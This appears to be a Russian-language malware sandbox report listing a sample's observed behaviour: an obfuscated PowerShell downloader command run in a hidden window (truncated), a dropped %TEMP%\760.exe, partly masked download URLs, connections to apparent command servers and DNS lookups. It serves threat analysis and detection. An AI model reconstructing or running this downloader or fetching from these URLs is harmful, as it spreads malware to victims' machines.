Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ((VariAble '*MdR*').nAmE[3,11,2]-jOIn'')(-jOIN(( 44 , 96 , 68, 70 ,53, 102,109, 127,37 ,103,106 ,98,109, 107 , 124, 40 ,70,109,124 ,38 ,95 , 109,106 ,75 ,100, 97 ,109,102,124, 51 ,44,123 , 98...
- %TEMP%\760.exe
- %TEMP%\760.exe
- 'ld####hicdesign.com':80
- 'di####taichinh.info':80
- 'di####taichinh.info':443
- 'cq###ykj.com':80
- 'cq###ykj.com':443
- 'pk#.goog':80
- 'de###lmill.com':80
- 'de###lmill.com':443
- http://www.ld####hicdesign.com/pOrCbD/
- http://www.di####taichinh.info/LOD3bm0/
- http://www.cq###ykj.com/hBbedQKac/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.de###lmill.com/jdhse/f72K1O1aL/
- 'di####taichinh.info':443
- 'cq###ykj.com':443
- 'de###lmill.com':443
- DNS ASK ld####hicdesign.com
- DNS ASK jn##68.com
- DNS ASK di####taichinh.info
- DNS ASK cq###ykj.com
- DNS ASK pk#.goog
- DNS ASK de###lmill.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ((VariAble '*MdR*').nAmE[3,11,2]-jOIn'')(-jOIN(( 44 , 96 , 68, 70 ,53, 102,109, 127,37 ,103,106 ,98,109, 107 , 124, 40 ,70,109,124 ,38 ,95 , 109,106 ,75 ,100, 97 ,109,102,124, 51 ,44,123 , 98...' (со скрытым окном)